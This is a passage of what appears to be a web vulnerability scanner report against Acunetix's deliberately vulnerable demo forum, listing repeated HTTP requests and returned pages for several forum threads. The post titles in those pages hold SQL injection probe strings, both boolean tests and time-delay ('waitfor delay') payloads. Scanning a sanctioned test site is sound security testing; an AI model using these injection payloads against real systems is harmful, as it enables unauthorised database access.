Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4237 |
Response Body - size: 4,237 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3*2>(0+5+983-983) or '3dwOAUtS'=' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3*2>(0+5+983-983) or '3dwOAUtS'=' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3*2>(0+5+983-983) or '3dwOAUtS'=' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=43 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=43 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4207 |
Response Body - size: 4,207 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1" OR 2+781-781-1=0+0+0+1 -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1" OR 2+781-781-1=0+0+0+1 -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1" OR 2+781-781-1=0+0+0+1 -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=44 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=44 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4207 |
Response Body - size: 4,207 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1" OR 3+781-781-1=0+0+0+1 -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1" OR 3+781-781-1=0+0+0+1 -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:54 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1" OR 3+781-781-1=0+0+0+1 -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=45 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=45 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4201 |
Response Body - size: 4,201 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1" OR 3*2<(0+5+781-781) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1" OR 3*2<(0+5+781-781) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:54 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1" OR 3*2<(0+5+781-781) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=46 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=46 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4201 |
Response Body - size: 4,201 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1" OR 3*2>(0+5+781-781) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1" OR 3*2>(0+5+781-781) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:54 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1" OR 3*2>(0+5+781-781) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=47 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=47 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4201 |
Response Body - size: 4,201 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 1 waitfor delay '0:0:15' -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/1 waitfor delay '0:0:15' -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:55 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>1 waitfor delay '0:0:15' -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=48 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=48 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4228 |
Response Body - size: 4,228 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum UGrs47CJ'; waitfor delay '0:0:15' -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/UGrs47CJ'; waitfor delay '0:0:15' -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:55 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>UGrs47CJ'; waitfor delay '0:0:15' -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div 